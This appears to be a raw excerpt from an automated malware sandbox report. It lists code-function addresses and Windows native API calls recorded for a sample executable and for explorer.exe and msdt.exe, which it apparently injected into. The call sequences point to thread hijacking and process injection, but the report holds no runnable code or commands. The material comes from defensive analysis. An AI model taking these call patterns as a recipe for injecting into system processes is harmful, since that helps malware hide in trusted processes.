Source: C:\Windows\explorer.exe	Code function: 5_2_0FBBC232 NtCreateFile,	5_2_0FBBC232
Source: C:\Windows\explorer.exe	Code function: 5_2_0FBBDE12 NtProtectVirtualMemory,	5_2_0FBBDE12
Source: C:\Windows\explorer.exe	Code function: 5_2_0FBBDE0A NtProtectVirtualMemory,	5_2_0FBBDE0A
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_008B1CBD NtOpenThreadToken,NtOpenProcessToken,NtQueryInformationToken,NtClose,	6_2_008B1CBD
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_008B1C50 NtQueryInformationToken,NtQueryInformationToken,	6_2_008B1C50
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04A82CA0 NtQueryInformationToken,LdrInitializeThunk,	6_2_04A82CA0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04A82C60 NtCreateKey,LdrInitializeThunk,	6_2_04A82C60
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04A82C70 NtFreeVirtualMemory,LdrInitializeThunk,	6_2_04A82C70
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04A82DF0 NtQuerySystemInformation,LdrInitializeThunk,	6_2_04A82DF0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04A82DD0 NtDelayExecution,LdrInitializeThunk,	6_2_04A82DD0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04A82D10 NtMapViewOfSection,LdrInitializeThunk,	6_2_04A82D10
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04A82EA0 NtAdjustPrivilegesToken,LdrInitializeThunk,	6_2_04A82EA0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04A82FE0 NtCreateFile,LdrInitializeThunk,	6_2_04A82FE0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04A82F30 NtCreateSection,LdrInitializeThunk,	6_2_04A82F30
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04A82AD0 NtReadFile,LdrInitializeThunk,	6_2_04A82AD0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04A82BE0 NtQueryValueKey,LdrInitializeThunk,	6_2_04A82BE0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04A82BF0 NtAllocateVirtualMemory,LdrInitializeThunk,	6_2_04A82BF0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04A82B60 NtClose,LdrInitializeThunk,	6_2_04A82B60
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04A835C0 NtCreateMutant,LdrInitializeThunk,	6_2_04A835C0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04A84650 NtSuspendThread,	6_2_04A84650
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04A84340 NtSetContextThread,	6_2_04A84340
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04A82CF0 NtOpenProcess,	6_2_04A82CF0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04A82CC0 NtQueryVirtualMemory,	6_2_04A82CC0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04A82C00 NtQueryInformationProcess,	6_2_04A82C00
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04A82DB0 NtEnumerateKey,	6_2_04A82DB0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04A82D30 NtUnmapViewOfSection,	6_2_04A82D30
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04A82D00 NtSetInformationFile,	6_2_04A82D00
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04A82E80 NtReadVirtualMemory,	6_2_04A82E80
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04A82EE0 NtQueueApcThread,	6_2_04A82EE0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04A82E30 NtWriteVirtualMemory,	6_2_04A82E30
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04A82FA0 NtQuerySection,	6_2_04A82FA0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04A82FB0 NtResumeThread,	6_2_04A82FB0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04A82F90 NtProtectVirtualMemory,	6_2_04A82F90
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04A82F60 NtCreateProcessEx,	6_2_04A82F60
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04A82AB0 NtWaitForSingleObject,	6_2_04A82AB0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04A82AF0 NtWriteFile,	6_2_04A82AF0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04A82BA0 NtEnumerateValueKey,	6_2_04A82BA0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04A82B80 NtQueryInformationFile,	6_2_04A82B80
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04A83090 NtSetValueKey,	6_2_04A83090
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04A83010 NtOpenDirectoryObject,	6_2_04A83010
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04A83D10 NtOpenProcessToken,	6_2_04A83D10
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04A83D70 NtOpenThread,	6_2_04A83D70
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04A839B0 NtGetContextThread,	6_2_04A839B0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_0081A360 NtCreateFile,	6_2_0081A360
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_0081A490 NtClose,	6_2_0081A490
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_0081A410 NtReadFile,	6_2_0081A410
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_0081A540 NtAllocateVirtualMemory,	6_2_0081A540
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_0081A48C NtClose,	6_2_0081A48C
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_0081A40A NtReadFile,	6_2_0081A40A
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_0081A53D NtAllocateVirtualMemory,	6_2_0081A53D
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_0475A036 NtQueryInformationProcess,NtSuspendThread,NtSetContextThread,RtlQueueApcWow64Thread,NtResumeThread,	6_2_0475A036
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04759BAF NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtUnmapViewOfSection,NtClose,	6_2_04759BAF
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_0475A042 NtQueryInformationProcess,	6_2_0475A042
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04759BB2 NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	6_2_04759BB2

Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 0_2_01064071	0_2_01064071
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 0_2_01060040	0_2_01060040
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 0_2_01066048	0_2_01066048
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 0_2_01060610	0_2_01060610
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 0_2_02B263D8	0_2_02B263D8
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 0_2_02B263C8	0_2_02B263C8
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 0_2_0792E0D0	0_2_0792E0D0
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 0_2_0792E780	0_2_0792E780
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 0_2_0792B988	0_2_0792B988
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 0_2_079463AF	0_2_079463AF
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 0_2_079463E8	0_2_079463E8
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 0_2_0794E1C8	0_2_0794E1C8
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 0_2_0794DD90	0_2_0794DD90
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 0_2_0794D938	0_2_0794D938
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_00401030	4_2_00401030
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_0041E140	4_2_0041E140
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_004012FB	4_2_004012FB
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_0041ECC1	4_2_0041ECC1
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_0041DDC2	4_2_0041DDC2
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_00402D87	4_2_00402D87
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_00402D90	4_2_00402D90
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_0041D5A6	4_2_0041D5A6
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_00409E60	4_2_00409E60
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_0041EEF4	4_2_0041EEF4
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_00402FB0	4_2_00402FB0
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_01190100	4_2_01190100
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_0123A118	4_2_0123A118
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_01228158	4_2_01228158
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_012541A2	4_2_012541A2
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_012601AA	4_2_012601AA
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_012581CC	4_2_012581CC
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_01232000	4_2_01232000
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_0125A352	4_2_0125A352
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_012603E6	4_2_012603E6
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011AE3F0	4_2_011AE3F0
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_01240274	4_2_01240274
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_012202C0	4_2_012202C0
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011A0535	4_2_011A0535
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_01260591	4_2_01260591
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_01244420	4_2_01244420
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_01252446	4_2_01252446
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_0124E4F6	4_2_0124E4F6
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011C4750	4_2_011C4750
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011A0770	4_2_011A0770
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_0119C7C0	4_2_0119C7C0
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011BC6E0	4_2_011BC6E0
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011B6962	4_2_011B6962
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_0126A9A6	4_2_0126A9A6
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011A29A0	4_2_011A29A0
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011A2840	4_2_011A2840
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011AA840	4_2_011AA840
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011868B8	4_2_011868B8
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011CE8F0	4_2_011CE8F0
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_0125AB40	4_2_0125AB40
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_01256BD7	4_2_01256BD7
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_0119EA80	4_2_0119EA80
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011AAD00	4_2_011AAD00
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_0123CD1F	4_2_0123CD1F
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011B8DBF	4_2_011B8DBF
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_0119ADE0	4_2_0119ADE0
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011A0C00	4_2_011A0C00
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_01240CB5	4_2_01240CB5
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_01190CF2	4_2_01190CF2
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_01242F30	4_2_01242F30
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011C0F30	4_2_011C0F30
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011E2F28	4_2_011E2F28
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_01214F40	4_2_01214F40
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_0121EFA0	4_2_0121EFA0
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_01192FC8	4_2_01192FC8
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_0125EE26	4_2_0125EE26
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011A0E59	4_2_011A0E59
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011B2E90	4_2_011B2E90
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_0125CE93	4_2_0125CE93
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_0125EEDB	4_2_0125EEDB
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_0126B16B	4_2_0126B16B
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_0118F172	4_2_0118F172
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011D516C	4_2_011D516C
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011AB1B0	4_2_011AB1B0
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_0125F0E0	4_2_0125F0E0
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_012570E9	4_2_012570E9
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011A70C0	4_2_011A70C0
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_0124F0CC	4_2_0124F0CC
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_0125132D	4_2_0125132D
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_0118D34C	4_2_0118D34C
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011E739A	4_2_011E739A
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011A52A0	4_2_011A52A0
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_012412ED	4_2_012412ED
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011BB2C0	4_2_011BB2C0
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011BD2F0	4_2_011BD2F0
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_01257571	4_2_01257571
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_0123D5B0	4_2_0123D5B0
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_012695C3	4_2_012695C3
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_0125F43F	4_2_0125F43F
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_01191460	4_2_01191460
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_0125F7B0	4_2_0125F7B0
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011E5630	4_2_011E5630
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_012516CC	4_2_012516CC
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_01235910	4_2_01235910
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011A9950	4_2_011A9950
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011BB950	4_2_011BB950
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_0120D800	4_2_0120D800
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011A38E0	4_2_011A38E0
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_0125FB76	4_2_0125FB76
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011BFB80	4_2_011BFB80
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_01215BF0	4_2_01215BF0
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011DDBF9	4_2_011DDBF9
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_01213A6C	4_2_01213A6C
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_01257A46	4_2_01257A46
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_0125FA49	4_2_0125FA49
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_01241AA3	4_2_01241AA3
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_0123DAAC	4_2_0123DAAC
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011E5AA0	4_2_011E5AA0
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_0124DAC6	4_2_0124DAC6
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_01257D73	4_2_01257D73
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011A3D40	4_2_011A3D40
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_01251D5A	4_2_01251D5A
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011BFDC0	4_2_011BFDC0
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_01219C32	4_2_01219C32
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_0125FCF2	4_2_0125FCF2
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_0125FF09	4_2_0125FF09
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011A1F92	4_2_011A1F92
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_0125FFB1	4_2_0125FFB1
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_01163FD5	4_2_01163FD5
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_01163FD2	4_2_01163FD2
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011A9EB0	4_2_011A9EB0
Source: C:\Windows\explorer.exe	Code function: 5_2_0E8C3232	5_2_0E8C3232
Source: C:\Windows\explorer.exe	Code function: 5_2_0E8BDB32	5_2_0E8BDB32
Source: C:\Windows\explorer.exe	Code function: 5_2_0E8BDB30	5_2_0E8BDB30
Source: C:\Windows\explorer.exe	Code function: 5_2_0E8B9082	5_2_0E8B9082
Source: C:\Windows\explorer.exe	Code function: 5_2_0E8C2036	5_2_0E8C2036
Source: C:\Windows\explorer.exe	Code function: 5_2_0E8C65CD	5_2_0E8C65CD
Source: C:\Windows\explorer.exe	Code function: 5_2_0E8BAD02	5_2_0E8BAD02
Source: C:\Windows\explorer.exe	Code function: 5_2_0E8C0912	5_2_0E8C0912
Source: C:\Windows\explorer.exe	Code function: 5_2_0F6B2B32	5_2_0F6B2B32
Source: C:\Windows\explorer.exe	Code function: 5_2_0F6B2B30	5_2_0F6B2B30
Source: C:\Windows\explorer.exe	Code function: 5_2_0F6B8232	5_2_0F6B8232
Source: C:\Windows\explorer.exe	Code function: 5_2_0F6AFD02	5_2_0F6AFD02
Source: C:\Windows\explorer.exe	Code function: 5_2_0F6B5912	5_2_0F6B5912
Source: C:\Windows\explorer.exe	Code function: 5_2_0F6BB5CD	5_2_0F6BB5CD
Source: C:\Windows\explorer.exe	Code function: 5_2_0F6B7036	5_2_0F6B7036
Source: C:\Windows\explorer.exe	Code function: 5_2_0F6AE082	5_2_0F6AE082
Source: C:\Windows\explorer.exe	Code function: 5_2_0FBBC232	5_2_0FBBC232
Source: C:\Windows\explorer.exe	Code function: 5_2_0FBBF5CD	5_2_0FBBF5CD
Source: C:\Windows\explorer.exe	Code function: 5_2_0FBB6B32	5_2_0FBB6B32
Source: C:\Windows\explorer.exe	Code function: 5_2_0FBB6B30	5_2_0FBB6B30
Source: C:\Windows\explorer.exe	Code function: 5_2_0FBB9912	5_2_0FBB9912
Source: C:\Windows\explorer.exe	Code function: 5_2_0FBB3D02	5_2_0FBB3D02
Source: C:\Windows\explorer.exe	Code function: 5_2_0FBB2082	5_2_0FBB2082
Source: C:\Windows\explorer.exe	Code function: 5_2_0FBBB036	5_2_0FBBB036
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_0089F0DB	6_2_0089F0DB
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_008BC803	6_2_008BC803
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_00895950	6_2_00895950
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_008AFCE7	6_2_008AFCE7
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_008B2FD3	6_2_008B2FD3
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_008A4702	6_2_008A4702
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04AFE4F6	6_2_04AFE4F6
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04AF4420	6_2_04AF4420
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04B02446	6_2_04B02446
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04B10591	6_2_04B10591
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04A50535	6_2_04A50535
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04A6C6E0	6_2_04A6C6E0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04A4C7C0	6_2_04A4C7C0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04A50770	6_2_04A50770
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04A74750	6_2_04A74750
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04AE2000	6_2_04AE2000
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04B041A2	6_2_04B041A2
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04B101AA	6_2_04B101AA
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04B081CC	6_2_04B081CC
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04A40100	6_2_04A40100
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04AEA118	6_2_04AEA118
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04AD8158	6_2_04AD8158
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04AD02C0	6_2_04AD02C0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04AF0274	6_2_04AF0274
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04A5E3F0	6_2_04A5E3F0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04B103E6	6_2_04B103E6
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04B0A352	6_2_04B0A352
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04AF0CB5	6_2_04AF0CB5
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04A40CF2	6_2_04A40CF2
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04A50C00	6_2_04A50C00
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04A68DBF	6_2_04A68DBF
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04A4ADE0	6_2_04A4ADE0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04A5AD00	6_2_04A5AD00
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04AECD1F	6_2_04AECD1F
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04B0CE93	6_2_04B0CE93
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04A62E90	6_2_04A62E90
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04B0EEDB	6_2_04B0EEDB
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04B0EE26	6_2_04B0EE26
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04A50E59	6_2_04A50E59
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04ACEFA0	6_2_04ACEFA0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04A42FC8	6_2_04A42FC8
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04A92F28	6_2_04A92F28
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04A70F30	6_2_04A70F30
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04AF2F30	6_2_04AF2F30
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04AC4F40	6_2_04AC4F40
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04A368B8	6_2_04A368B8
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04A7E8F0	6_2_04A7E8F0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04A52840	6_2_04A52840
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04A5A840	6_2_04A5A840
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04A529A0	6_2_04A529A0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04B1A9A6	6_2_04B1A9A6
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04A66962	6_2_04A66962
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04A4EA80	6_2_04A4EA80
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04B06BD7	6_2_04B06BD7
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04B0AB40	6_2_04B0AB40
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04B0F43F	6_2_04B0F43F
